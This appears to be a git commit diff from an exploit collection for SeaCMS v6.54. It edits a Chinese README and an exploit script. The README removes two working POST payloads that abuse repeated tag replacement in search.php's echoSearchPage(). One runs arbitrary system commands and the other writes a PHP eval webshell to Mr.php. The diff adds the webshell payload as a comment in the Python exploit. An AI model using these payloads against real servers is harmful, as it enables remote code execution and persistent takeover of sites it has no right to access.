Little Change

2017-10-12 12:39:01 +08:00 · 2017-10-12 12:39:01 +08:00 · 09b5ac323c
commit 09b5ac323c
parent 4a89ff0dce
2 changed files with 1 additions and 7 deletions
--- a/CMS/Seacms/Seacms_v6.54/README.md
+++ b/CMS/Seacms/Seacms_v6.54/README.md
@ -1,8 +1,2 @@
 漏洞详情:                        
 	漏洞位于search.php处，echoSearchPage()函数对html中的searchpage标签进行了多次的替换，多次替换过程中不断组合形成payload    
-PostData:      
-	searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=sys&9[]=tem('cmd');
-	可执行任意命令      
-PostData:          
-    searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=fwrite(&9[]=fopen('Mr.php','w')&9[]=,'<?php eval($_POST["Mr"]);?>');         
-    可GetShell
--- a/CMS/Seacms/Seacms_v6.54/Seacms_v6.54_exp.py
+++ b/CMS/Seacms/Seacms_v6.54/Seacms_v6.54_exp.py
@ -2,7 +2,7 @@

 #author : Mr5m1th

-
+#PostData  = searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=fwrite(&9[]=fopen('Mr.php','w')&9[]=,'<?php eval($_POST["Mr"]);?>');
 import hackhttp
 import sys
 import requests